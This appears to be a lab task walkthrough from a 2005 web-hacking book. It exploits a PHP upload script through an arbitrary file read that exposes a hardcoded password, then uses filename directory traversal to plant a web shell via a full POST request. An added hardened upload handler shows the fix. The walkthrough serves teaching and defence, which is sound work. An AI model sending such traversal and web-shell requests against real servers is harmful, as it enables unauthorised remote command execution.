Task 2

Examine the available links to uploaded files:

  • http://localhost/zadachi/2/upload.php?f=1.txt

  • http://localhost/zadachi/2/upload.php?f=xxx.txt

After the second request, you can suspect there is a vulnerability allowing you to read arbitrary files. Indeed, it is the following:


If you examine the HTML code of the page, you'll notice the source code of the INDEX.PHP script. Analyze the contents of the INDEX.PHP file.

The following line discloses the password necessary to upload files.

 if($pass<>'f8n74ggf4') die('Invalid password. The file was not uploaded.'); 

The password is f8n74ggf4.

The knowledge of the password allows you to upload any file.

By default, files are uploaded into the ./upload/ directory, which is inaccessible from a browser over HTTP. Access is restricted in the .htaccess file. You can obtain the contents of this file using the following request:


Analyze the INDEX.PHP script further. There is a vulnerability in the following line:

 copy($userfile, "./upload/$userfile_name"); 

The vulnerability is that the $userfile and $userfile_name variables are used without any filtering. Therefore, you can do the following:

  1. Copy any file to the /UPLOAD/ directory by forging the $userfile values.

  2. Load a file into any location by embedding a directory traversal sequence into the file name in the header of the POST request.

  3. Use the previous two methods to copy any file to any location.
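The following is an added example, not code from the book or from the task's INDEX.PHP: the vulnerable copy() line quoted above, shown beside a hardened upload handler that closes the three holes listed (forged $userfile values, traversal in the file name, and the password sitting in plaintext in readable source). The field name "userfile" and the ./upload/ directory come from the page; the allow-list of extensions, the PASS_HASH placeholder and the function names are assumptions of this example.

```php
<?php
// Added example (not the book's code): hardened replacement for the task's
//   copy($userfile, "./upload/$userfile_name");
// where both variables came straight from the request.

const UPLOAD_DIR  = __DIR__ . '/upload';          // same directory as the task
const ALLOWED_EXT = ['txt', 'png', 'jpg'];         // assumed allow-list; no scripts
// Placeholder: a password_hash() value kept outside the web root, never the
// literal password (the task's source disclosed 'f8n74ggf4' in plaintext).
const PASS_HASH   = '<password_hash() output goes here>';

function password_ok(string $candidate): bool {
    // password_verify() is constant-time; '<>' on a plaintext literal is not,
    // and the literal itself is readable through the file-read bug.
    return password_verify($candidate, PASS_HASH);
}

function safe_upload_name(string $client_name): ?string {
    // basename() drops every directory component, so "../cmd.php" becomes "cmd.php".
    $base = basename($client_name);
    // Conservative character set; rejects spaces, NULs, unicode tricks.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}\.[A-Za-z0-9]{1,8}$/', $base)) {
        return null;
    }
    // Exactly one dot, so "shell.php.txt" style double extensions are refused.
    $ext = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    return $base;
}

function handle_upload(array $file): bool {
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return false;
    }
    // is_uploaded_file() only accepts the temp path PHP itself created for this
    // request; a forged source path (method 1 above) fails here.
    if (!is_uploaded_file($file['tmp_name'])) {
        return false;
    }
    $name = safe_upload_name((string) $file['name']);
    if ($name === null) {
        return false;
    }
    $dest = UPLOAD_DIR . '/' . $name;
    // Belt-and-braces: the resolved parent directory must be UPLOAD_DIR itself.
    if (realpath(dirname($dest)) !== realpath(UPLOAD_DIR)) {
        return false;
    }
    // move_uploaded_file() likewise refuses anything that is not a genuine upload.
    return move_uploaded_file($file['tmp_name'], $dest);
}

if (!password_ok($_POST['pass'] ?? '')) {
    http_response_code(403);
    exit("Invalid password. The file was not uploaded.\n");
}
if (isset($_FILES['userfile'])) {
    echo handle_upload($_FILES['userfile']) ? "Uploaded.\n" : "Upload rejected.\n";
}
```

The two checks that matter most against the request shown later on this page are basename() on the client-supplied name and the extension allow-list: the first keeps the file inside ./upload/, the second keeps a .php file from being written at all. Keeping ./upload/ non-executable (the task's .htaccess already denies HTTP access) remains a useful second layer even with the handler fixed.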

To upload and execute the PHP shell code, the second method is most suitable. To implement it, you need to create a POST HTTP request to the server.

The request can look like the following:

 POST /zadachi/2/ HTTP/1.1
 Host: localhost
 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.2) Gecko/20040803
 Accept: */*
 Accept-Language: en-us;q=0.5
 Accept-Encoding: gzip, deflate
 Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
 Keep-Alive: 3000
 Connection: keep-alive
 Referer: http://localhost/2/19.php
 Content-Type: multipart/form-data; boundary=---------------------------491299511942
 Content-Length: 417
 <empty line>
 -----------------------------491299511942
 Content-Disposition: form-data; name="pass"
 <empty line>
 f8n74ggf4
 -----------------------------491299511942
 Content-Disposition: form-data; name="MAX_FILE_SIZE"
 <empty line>
 10000
 -----------------------------491299511942
 Content-Disposition: form-data; name="userfile"; filename="../cmd.php"
 Content-Type: text/plain
 <empty line>
 <? system($cmd) ?>
 -----------------------------491299511942--

After you send this request to the server (e.g., by connecting directly to port 80 of the server using telnet), the http://localhost/zadachi/2/cmd.php file will be created on the server. It will be available using HTTP.

The file is PHP shell code.

The task is solved.

Hacker Web Exploitation Uncovered
ISBN: 1931769494
Year: 2005
Pages: 77
